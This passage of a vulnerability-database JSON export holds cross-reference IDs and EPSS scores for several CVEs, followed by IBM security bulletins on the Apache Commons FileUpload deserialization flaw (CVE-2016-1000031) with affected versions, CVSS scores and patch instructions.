"TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntu", "idList": ["USN-4166-1", "USN-4166-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-1000031", "UB:CVE-2017-5638", "UB:CVE-2019-11043"]}, {"type": "veracode", "idList": ["VERACODE:25361"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdi", "idList": ["ZDI-16-570"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-33426", "1337DAY-ID-34058"]}]}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2019:3735", "ALSA-2019:3736"]}, {"type": "amazon", "idList": ["ALAS-2019-1315", "ALAS2-2019-1344"]}, {"type": "apple", "idList": ["APPLE:57687011D0766424B56EB268957F8A8B", "APPLE:HT210919"]}, {"type": "archlinux", "idList": ["ASA-201910-14"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:1A028E9F-233B-47D8-8C85-FD179A3627EC", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2019:3286", "CESA-2019:3287"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2019-1453"]}, {"type": "cisa", "idList": ["CISA:848AFE845B4D41B0B59F2090C2571363"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1970-1:E007F", "DEBIAN:DSA-4552-1:9E828", "DEBIAN:DSA-4553-1:8D47C"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-11043"]}, {"type": "exploitdb", "idList": ["EDB-ID:47553"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9F633F41C64CB6F19F95C80592ADA235"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K75408500"]}, {"type": "fedora", "idList": ["FEDORA:314A160963EE", "FEDORA:E3A496077836", "FEDORA:E83286076F61"]}, {"type": "freebsd", "idList": ["6A7C2AB0-00DD-11EA-83CE-705A0F828759", "C1265E85-7C95-11E7-93AF-005056925DB4"]}, {"type": "gentoo", "idList": ["GLSA-201910-01"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["37252618-7152-5162-BF75-250EE342CB49", "391F4CAB-3936-5680-ABC7-E2BAC6F388E1", "4CD5443F-B7DE-59CB-A1DB-A86A9195A110", "552AB4A5-9474-5375-9A1E-7A4EFC3238D2", "6472B526-9541-56D3-B098-8199F554937C", "6E11EB2E-EFDA-5C6C-B822-245A4F08AFAA", "731BC7EF-75BA-5918-AA70-493EB4F15C1A", "89603B6A-F23E-5950-B12D-D7D3AEF329CA", "89BF594C-672A-50D6-B92C-9813C1361242", "919729FB-143D-5088-981B-D27AD2B3F5D2", "927524F4-E84C-5F1F-B3F9-E65CE2A1FD21", "999BE14F-35F1-56A6-925F-BAAB2E141BE1", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "DD9F5BE6-AA7E-55A9-9099-8CDE03A2ADEE", "DFB00902-0D20-56C6-8EF8-0D8351E62151", "E54F0CA1-3DDF-5A07-9863-1DDF42E4BFFB", "F7412832-C589-52D7-B910-DE4B7233DBD5"]}, {"type": "hackerone", "idList": ["H1:720306"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:70B3C77A2DC5965EB28755E5F9FD9BFD", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/PHP_FPM_RCE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201891264"]}, {"type": "nessus", "idList": ["AL2_ALAS-2019-1344.NASL", "ALA_ALAS-2019-1315.NASL", "CENTOS_RHSA-2019-3286.NASL", "CENTOS_RHSA-2019-3287.NASL", "DEBIAN_DLA-1970.NASL", "DEBIAN_DSA-4552.NASL", "DEBIAN_DSA-4553.NASL", "FEDORA_2019-187AE3128D.NASL", "FEDORA_2019-4ADC49A476.NASL", "FEDORA_2019-7BB07C3B02.NASL", "FREEBSD_PKG_6A7C2AB000DD11EA83CE705A0F828759.NASL", "GENTOO_GLSA-201910-01.NASL", "NEWSTART_CGSL_NS-SA-2020-0018_PHP.NASL", "OPENSUSE-2019-1399.NASL", "OPENSUSE-2019-2441.NASL", "OPENSUSE-2019-2457.NASL", "ORACLELINUX_ELSA-2019-3286.NASL", "ORACLELINUX_ELSA-2019-3287.NASL", "ORACLELINUX_ELSA-2019-3735.NASL", "ORACLELINUX_ELSA-2019-3736.NASL", "PHP_7_3_11.NASL", "REDHAT-RHSA-2019-3286.NASL", "REDHAT-RHSA-2019-3287.NASL", "REDHAT-RHSA-2019-3735.NASL", "REDHAT-RHSA-2019-3736.NASL", "SL_20191031_PHP_ON_SL6_X.NASL", "SL_20191031_PHP_ON_SL7_X.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "SUSE_SU-2019-2809-1.NASL", "SUSE_SU-2019-2819-1.NASL", "SUSE_SU-2019-2909-1.NASL", "SUSE_SU-2020-0522-1.NASL", "UBUNTU_USN-4166-1.NASL", "VIRTUOZZO_VZLSA-2019-3286.NASL", "VIRTUOZZO_VZLSA-2019-3287.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108692", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310704552", "OPENVAS:1361412562310704553", "OPENVAS:1361412562310844212", "OPENVAS:1361412562310852763", "OPENVAS:1361412562310876958", "OPENVAS:1361412562310876962", "OPENVAS:1361412562310883127", "OPENVAS:1361412562310883128", "OPENVAS:1361412562310891970"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-3286", "ELSA-2019-3287", "ELSA-2019-3735", "ELSA-2019-3736"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:156642"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:FAA1D7335127516FFE0506E88A2CC6C6"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2019:3300", "RHSA-2019:3735", "RHSA-2019:3736"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-11043"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1399-1", "OPENSUSE-SU-2019:2441-1", "OPENSUSE-SU-2019:2457-1"]}, {"type": "symantec", "idList": ["SMNTC-110608"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:B9AD1A8C118DBF486256A5AD0D9ECBE6"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AB0C28CDDB0FA6104DA18A74EECF88BE", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:E415063B3415D9F4A6E3554945E34C23", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntu", "idList": ["USN-4166-1", "USN-4166-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-11043"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdi", "idList": ["ZDI-16-570"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-34058"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-1000031", "epss": "0.042270000", "percentile": "0.909190000", "modified": "2023-03-15"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11043", "epss": "0.973750000", "percentile": "0.998060000", "modified": "2023-03-15"}], "vulnersScore": 1.1}, "_state": {"dependencies": 1678918916, "score": 1683995972, "epss": 1678939848}, "_internal": {"score_hash": "05220b12e8703a787ec2c03455a75d48"}}

{"ibm": [{"lastseen": "2023-02-21T01:52:54", "description": "## Summary\n\nThere is a potential vulnerability in the Apache Commons FileUpload used by WebSphere Application Server traditional and WebSphere Application Server Liberty. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in several products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThese vulnerabilities affect all versions of Liberty for Java in IBM Bluemix up to and including v3.17.1.\n\n## Remediation/Fixes\n\nTo upgrade to Liberty for Java v3.18-20180213-1234 or higher, you must re-stage or re-push your application. \n \nTo find the current version of Liberty for Java in IBM Bluemix being used, from the command-line Cloud Foundry client by running the following commands: \n \n**cf ssh <appname> -c cat \"staging_info.yml\"** \n \nLook for the following lines: \n \n{\"detected_buildpack\":\"Liberty for Java(TM) (WAR, liberty-xxx, buildpack-v3.xxx, ibmjdk-1.8.0_xxx, env)\",\"start_command\":\".liberty/initial_startup.rb\"} \n \nTo re-stage your application using the command-line Cloud Foundry client, use the following command: \n \n**cf restage <appname>** \n \nTo re-push your application using the command-line Cloud Foundry client, use the following command: \n \n**cf push <appname>**\n\n## Workarounds and Mitigations\n\nnone\n\n## Monitor IBM Cloud Status for Future Security Bulletins\n\nMonitor the [security notifications](<https://cloud.ibm.com/status?selected=security>) on the IBM Cloud Status page to be advised of future security bulletins.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 February 2018: Original document published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n[{\"Product\":{\"code\":\"SS4JBE\",\"label\":\"Liberty for Java for IBM Cloud\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB21\",\"label\":\"Public Cloud Platform\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:08:55", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache Commons FileUpload used by Liberty for Java for IBM Cloud (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:55", "id": "F4B9D71D3FABEC6658928AA2A337B66B863636EDAA889DCF19CDC196449826D5", "href": "https://www.ibm.com/support/pages/node/304719", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:49:30", "description": "## Summary\n\nIBM Security Identity Manager (ISIM) has addressed the following vulnerability. Apache Commons FileUpload could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Product Version** \n--- \nISIM 6.0 \n \n## Remediation/Fixes\n\nProduct | VRMF | Remediation \n---|---|--- \nISIM | 6.0 | [6.0.0-ISS-SIM-FP0020 ](<https://www-945.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=6.0.0-ISS-SIM-FP0020&continue=1>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-31T02:56:18", "type": "ibm", "title": "Security Bulletin: IBM Security Identity Manager is affected by an Apache vulnerability.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-07-31T02:56:18", "id": "FB50FC72D1ADF03C64135E473D71F8FDDDF0FBB202D69511A7EA94874CC168D1", "href": "https://www.ibm.com/support/pages/node/719413", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:54:38", "description": "## Summary\n\nApache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n** DESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117957](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM eDiscovery Manager| 2.2.2 \n \n\n\n## Remediation/Fixes\n\nProduct \n\n| VRM| Remediation \n---|---|--- \nIBM eDiscovery Manager| 2.2.2| Use IBM eDiscovery Manager 2.2.2.3 [Interim Fix 003](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-WIN-IF003&source=SAR> \"Interim Fix 003\" ) for Windows \n\nUse IBM eDiscovery Manager 2.2.2.3 [Interim Fix 003](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF003&source=SAR> \"Interim Fix 003\" ) for AIX \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T22:03:53", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload (Publicly disclosed vulnerability) in IBM eDiscovery Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2020-06-19T22:03:53", "id": "266AF5CCE2935A1632FAEA2AD2ADEC7D3B1EF6585030A41069E05308C44DE9B2", "href": "https://www.ibm.com/support/pages/node/6236356", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:55:14", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nThis vulnerability affects the following versions and releases of IBM WebSphere Remote Server: \n\u2022 8.5, 9.0\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server. \n \n\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nWebSphere Remote Server 8.5, 9.0| WebSphere Application Server 8.0, 8.5, 8.5.5, 9.0| [_Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server_](<http://www.ibm.com/support/docview.wss?uid=swg22011428>) \n \n## ", "cvss3": {}, "published": "2018-06-15T07:08:57", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:57", "id": "2B583BAC13559207D6199DBF313322FD679D7CAC25583ADB0D482CC288326F6B", "href": "https://www.ibm.com/support/pages/node/567405", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-28T22:03:42", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearQuest. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearQuest, ClearQuest CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x:**\n\nThis vulnerability only applies to the server component, and only for certain levels of WebSphere Application Server.\n\n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is shipped with IBM Rational ClearQuest. \n \n\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x| IBM WebSphere Application Server 8.0, 8.5 and 9.0.| [Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www.ibm.com/support/docview.wss?uid=swg22011428>) \n \n**ClearQuest Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n8.0.0.x \n8.0.1.x \n9.0.0.x \n9.0.1.x| \n\n 1. Determine the WAS version used by your CM server. Navigate to the CM profile directory (either the profile you specified when installing ClearQuest, or `<clearquest-home>/cqweb/cqwebprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section.\n 2. Identify the latest available fix (per the bulletin listed above) for the version of WAS used for CM server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CM server host. No ClearQuest-specific steps are necessary. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n* 6 March 2018: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\nCVE-ID: CVE-2016-1000031 \nDescription: Novell NetIQ Sentinel could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://apac01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fexchange.xforce.ibmcloud.com%2Fvulnerabilities%2F117957&data=02%7C01%7Cjohn.kohl%40hcl.com%7C59714a9853de4ba9a23408d5787db916%7C189de737c93a4f5a8b686f4ca9941912%7C0%7C0%7C636547403739164982&sdata=lQeayADkDigWY3db00Z4LZCyrzmQwEbZfGSRsSf2pMw%3D&reserved=0>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n[{\"Product\":{\"code\":\"SSSH5A\",\"label\":\"Rational ClearQuest\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"9.0.1.2;9.0.1.1;9.0.1;9.0.0.6;9.0.0.5;9.0.0.4;9.0.0.3;9.0.0.2;9.0.0.1;9.0;8.0.1.9;8.0.1.8;8.0.1.7;8.0.1.6;8.0.1.5;8.0.1.4;8.0.1.3;8.0.1.2;8.0.1.16;8.0.1.15;8.0.1.14;8.0.1.13;8.0.1.12;8.0.1.11;8.0.1.10;8.0.1.1;8.0.1;8.0.0.9;8.0.0.8;8.0.0.7;8.0.0.6;8.0.0.5;8.0.0.4;8.0.0.3;8.0.0.21;8.0.0.20;8.0.0.2;8.0.0.19;8.0.0.18;8.0.0.17;8.0.0.16;8.0.0.15;8.0.0.14;8.0.0.13;8.0.0.12;8.0.0.11;8.0.0.10;8.0.0.1;8.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": 